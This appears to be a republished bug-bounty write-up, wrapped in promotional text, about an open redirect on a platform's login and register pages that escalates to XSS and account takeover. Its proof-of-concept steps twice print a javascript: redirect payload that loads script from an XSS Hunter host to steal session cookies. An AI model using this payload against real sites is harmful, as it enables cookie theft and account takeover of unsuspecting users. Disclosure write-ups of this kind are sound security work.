How to Get 12 Million Rupiah in One Night (Open Redirect Lead to Account Takeover)

Attention all bug hunters! Have you ever come across a vulnerability in a private program and wanted to share your experience with the world? Well, one bug hunter, known by their nickname "rootbakar", has recently published an exciting tale of discovering a bug on the Peris.ai Korava Platform. This platform is part of Peris.ai Cybersecurity's offerings and aims to bring bug hunters and companies/organizations together through a transparent system, with bug reports verified by three different parties.

In this publication, rootbakar shares the details of their bug discovery in the login and registration features of the platform. This vulnerability allowed for an attacker to steal a victim's cookie through the exploitation of an Open Redirect vulnerability, which could escalate into an XSS attack. The cookie was then sent to XSS Hunter through a payload injected into a vulnerable URL or parameter.

The impact of this vulnerability could result in an account takeover, which rootbakar provides proof of concept for both the login and registration features. The timeline of the discovery, reporting, and fixing of the bug is also detailed in the publication, as well as the rewards received.

This exciting publication is a must-read for all bug hunters and those interested in the inner workings of cybersecurity. So don't miss out on rootbakar's unique experience on the Peris.ai Korava Platform and gain valuable insights into the bug hunting world. The original publication can be found on https://progress28.com/2023/01/02/how-to-get-12-million-rupiah-in-one-night-open-redirect-lead-to-account-takeover/

‍

Hi Bug Hunters!

In this article, I'd like to share my experience of finding a bug in a private program that I participated in on the Perisai Korava Platform. Before diving in, let me introduce myself - I go by the nickname "rootbakar."

So, let's get started...

‍

SUMMARY:

I came across a bug in the login and registration feature of the platform.

‍

Login & Register Feature:

This vulnerability enables an attacker to steal a cookie by exploiting the Open Redirect vulnerability in either the login or registration page, which can then be escalated into an XSS attack.

• ‍In the login feature, an unauthenticated user (not in a previous login state) can inject a payload into the vulnerable URL/parameter, specifically https://redacted/login?redirect={XSSHUNTER_PAYLOAD_HERE}.
• In the registration feature, an authenticated user (already in a previous login state) can do the same by injecting the payload into https://redacted/register?redirect={XSSHUNTER_PAYLOAD_HERE}. The cookie is then sent to XSS Hunter.

In this case, I found a vulnerability in the login and registration feature. The vulnerability allows an attacker to steal a cookie from an unauthenticated user in the login page, which can be escalated into XSS, or from an authenticated user in the register page. The cookie is then sent to XSS Hunter through a payload that has been injected into the vulnerable URL or parameter. Additionally, I discovered a data leak in the form of a phone number that was obtained from the cookie.

‍‍

The impact of this vulnerability is severe, as it can result in the takeover of a victim's account. I have provided a proof of concept for both the login and register feature, demonstrating how an attacker can use the vulnerability to gain access to a victim's account.

‍

Here is the complete information about the Proof of Concept for the Login and Register Feature:

Login Feature:

1. ‍‍‍The attacker sends a malicious link to the victim in the form of a link https://redacted/login?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
2. The victim accesses the malicious link sent by the attacker
3. The victim logs in using their account (using a phone number)
4. When the victim successfully logs in, the attacker will receive information in the form of a cookie that is sent to their email (the result of the XSS Hunter)
5. The attacker imports the cookie using a cookie-editor tool
6. The attacker refreshes the browser and the attacker successfully logs in as the victim.

Register Feature:

1. ‍Login to account A (victim account)
2. The attacker sends a malicious link to the victim in the form of https://redacted/register?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
3. The victim accesses the malicious link sent by the attacker
4. The victim fills in their name and clicks "Next"
5. The attacker receives information in the form of a cookie that is sent to their email (the result of the XSS Hunter)
6. The attacker imports the cookie using a cookie-editor tool
7. The attacker refreshes the browser and the attacker successfully logs in as the victim.

‍

I reported this bug in December 2022 and the triage process was completed in the same month with a P3 severity rating. The fix for this vulnerability is currently in progress. I received the rewards for this report in December 2022.

I hope this article provides valuable insights and information for fellow bug hunters. If you have any questions or feedback, please let me know.

Sharing my experience, I hope this article will be helpful and inspiring to my fellow bug hunters. If you're curious about the Peris.ai Korava Platform, let me tell you about it. It's a part of the Peris.ai Cybersecurity offerings and its aim is to bring transparency to the bug hunting process by having three parties verify each bug report submitted by hunters. The rewards system is also unique, as 50% of the reward is given after the triage report and the remaining 50% after retesting.

For those who want to try the platform, you can access the login page here. If you'd like to know more, visit the Peris.ai Cybersecurity website.

That concludes this article. If there are any mistakes or areas for improvement, I welcome constructive criticism and input from my fellow bug hunters. Wishing everyone good health and prosperity.

Best regards,

rootbakar.

‍

As we come to the end of this insightful article on the Perisai Korava Platform, we hope that our readers have gained a better understanding of the intricacies of bug hunting and the impact of a well-executed proof of concept. This publication has served as a testament to the tireless efforts of bug hunters, who work day in and day out to ensure the security of various online platforms.

We would like to extend our gratitude to rootbakar for sharing their experience with us and giving us a glimpse into the exciting world of bug hunting. This article has truly shed light on the importance of transparency and fairness in the bug bounty industry, and how platforms like Perisai Korava are making a difference.

We hope that this article has inspired and motivated our readers to take an active interest in bug hunting and to join the effort in making the digital world a safer place. Thank you for reading and we look forward to your next visit.